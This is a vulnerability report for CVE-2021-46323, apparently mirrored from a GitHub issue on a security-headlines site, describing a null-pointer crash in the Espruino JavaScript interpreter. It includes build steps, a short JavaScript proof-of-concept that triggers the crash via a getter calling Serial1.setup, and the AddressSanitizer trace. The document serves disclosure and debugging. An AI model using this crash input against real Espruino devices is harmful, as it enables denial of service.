Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46323: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass · Issue #2122 · espruino/Espruino

Espruino 2v11.251 was discovered to contain a SEGV vulnerability via src/jsinteractive.c in jsiGetDeviceFromClass.

CVE
Open in Source
#vulnerability#ubuntu#linux#js

Espruino revision

Commit: 53108085
Version: 2v11.251

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CCFLAGS=’-g -fsanitize=address -fno-omit-frame-pointer’ make clean && make

Test case

function JSEtest(v, i) { if (i === 1) { return v === 12; } return false; }

var obj = { length: 2 }; var h = 11;

Object.defineProperty(obj, "1", { get: Serial1.setup, set: function (args) { h = args; }, configurable: true });

Object.defineProperty(obj, "0", { get: obj[1], configurable: true });

assert(Array.prototype.some.call(obj, JSEtest));

Execution & Output

./Espruino/espruino poc.js

ASAN:DEADLYSIGNAL

=========ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564b36989594 bp 0x7ffddbd07060 sp 0x7ffddbd07060 T0) =========The signal is caused by a READ memory access. =====Hint: address points to the zero page. #0 0x564b36989593 in jsiGetDeviceFromClass src/jsinteractive.c:100 #1 0x564b36e1e10c in jswrap_serial_setup src/jswrap_serial.c:283 #2 0x564b36948eee in jsnCallFunction src/jsnative.c:223 #3 0x564b3695a983 in jspeFunctionCall src/jsparse.c:609 #4 0x564b36981d1e in jspExecuteFunction src/jsparse.c:3044 #5 0x564b3687d2ce in jsvExecuteGetter src/jsvar.c:1965 #6 0x564b3687ec87 in jsvSkipNameWithParent src/jsvar.c:2199 #7 0x564b3687f34d in jsvSkipName src/jsvar.c:2212 #8 0x564b3687f34d in jsvSkipNameAndUnLock src/jsvar.c:2244 #9 0x564b3697cb58 in jspeFactorObject src/jsparse.c:1261 #10 0x564b36979ed2 in jspeFactor src/jsparse.c:1673 #11 0x564b3695c91f in jspeFactorFunctionCall src/jsparse.c:1160 #12 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786 #13 0x564b36959436 in jspeBinaryExpression src/jsparse.c:1955 #14 0x564b36959436 in jspeConditionalExpression src/jsparse.c:1991 #15 0x564b36959436 in jspeAssignmentExpression src/jsparse.c:2050 #16 0x564b36959436 in jspeFunctionCall src/jsparse.c:578 #17 0x564b3695cbd2 in jspeFactorFunctionCall src/jsparse.c:1184 #18 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786 #19 0x564b3696183e in jspeBinaryExpression src/jsparse.c:1955 #20 0x564b3696183e in jspeConditionalExpression src/jsparse.c:1991 #21 0x564b3696183e in jspeAssignmentExpression src/jsparse.c:2050 #22 0x564b3696183e in jspeExpression src/jsparse.c:2056 #23 0x564b3696f6d4 in jspeBlockOrStatement src/jsparse.c:2124 #24 0x564b36971a1e in jspParse src/jsparse.c:2136 #25 0x564b369803ea in jspEvaluateVar src/jsparse.c:2996 #26 0x564b369803ea in jspEvaluate src/jsparse.c:3026 #27 0x564b36790025 in main targets/linux/main.c:460 #28 0x7f5e1f196bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #29 0x564b36793bc9 in _start (/root/Espruino/espruino+0x4ebc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE